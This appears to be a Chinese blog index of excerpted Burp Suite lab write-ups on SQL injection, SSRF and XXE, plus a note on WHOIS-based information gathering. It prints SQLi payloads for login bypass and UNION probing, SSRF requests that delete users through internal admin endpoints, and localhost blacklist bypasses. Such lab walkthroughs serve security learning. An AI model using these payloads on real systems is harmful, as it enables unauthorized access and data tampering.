burpsuite实验室sql注入通关记录
1.WHERE子句中的SQL注入漏洞允许检索隐藏数据抓包礼物分类按钮:
payload:
1/filter?category=Corporate+gifts'or+1=1--+
2.SQL注入漏洞允许登录绕过登陆框万能密码payload:
1administrator'--
3.SQL注入UNION攻击,确定查询返回的列数order by确定返回列数:
payload:
1Clothing%2c+shoes+and+accessories'order+by+§1§--+
爆破1,确定有三个字段
4.SQL注入UNION攻击,查找包含文本的列order by确定有三列
payload:
1'union+select+null,null,null--+
一次确定第二个字段为String类型
paylaod:
1'union+select+null,'aB4z0h',null--+
5.SQL注入UNION攻击,从其他表中检索数据确定产品分类处存在sql注入
pyload:
1'union ...
burpsuite实验室ssrf通关记录
1.针对本地服务器的基本SSRF库存查询按钮处,点击时会将url作为参数进行查询
访问:http://localhost
发现存在/admin目录
访问:http://localhost/admin
发现存在删除用户接口
访问:http://localhost/admin/delete?username=wiener即可删除用户
2.针对另一个后端系统的基本SSRF利用ssrf进行内网探测
使用bp intruder爆破内网8080端口,得到一个和其他访问不一样的status。说明该ip8080端口存在服务
访问admin目录
发现删除用户的连接
访问:http://192.168.0.122:8080/admin/delete?username=carlos
即可删除carlos用户
3.具有基于黑名单的输入过滤器的SSRF黑名单过滤了:
127.0.0.1 和localhost
可以使用代替ip进行绕过:
1例如2130706433,017700000001,或127.1
注册域名,解析为127.0.0.1
burp提供的spoofed.burpcollabor ...
信息收集
在拿到一个域名资产的时候首先要做的就是信息收集。毕竟大师傅们都说,渗透测试的本质是信息收集。
1. whois查询whois查询在对中小网站进行测试时很有用。通过whois查询可以知道域名注册人信息和注册邮箱。
对自己域名查询一下:
1.1 在线查询这里使用爱站在线查询:http://whois.chinaz.com/
淦!真实姓名和部分邮箱都暴露了
whois在线查询网站:
http://whois.chinaz.com/
(下面五个网站,连我完整qq都查出来了,恐怖如斯)
http://whois.nawang.cn/
https://www.zzy.cn/domain/whois.html
http://www.dns.com.cn/show/domain/whois/index.do
https://whois.cndns.com/
https://whois.ename.net/
更多在线查询网站:
西部数码域名WHOIS信息查询地址:https://whois.west.cn/
新网域名WHOIS信息查询地址:http://whois.xinnet.com/domain/ ...
burpsuite实验室xxe漏洞通关及知识点讲解
最近做了burpsuite实验室的xxe实验,感觉收益匪浅,即学到了漏洞相关知识,也能够实战巩固。特此文章记录一下实验过程,也对相关知识点做一番讲解。
1.xxe漏洞基础xxe 全称是xml external entity,也就是xml外部实体注入攻击。漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。
在了解xxe漏洞之前我们先来了解一些基础知识。
1.1 什么是XML?XML代表“可扩展标记语言”。XML是一种设计用于存储和传输数据的语言。像HTML一样,XML主要有标签和数据构成。与HTML不同的是,XML不使用预定义标签,因此可以给标签指定任意名称,也就是自定义标签名。
在Web的早期历史中,XML是一种流行的数据传输格式(“ AJAX”中的“ X”就是代表“ XML”)。但是,现在传输数据主要使用json格式,流行程度以不如以前。
实列代码:
123456<message><receiver>Myself</receiver><sender>Someone</sender><header>TheRe ...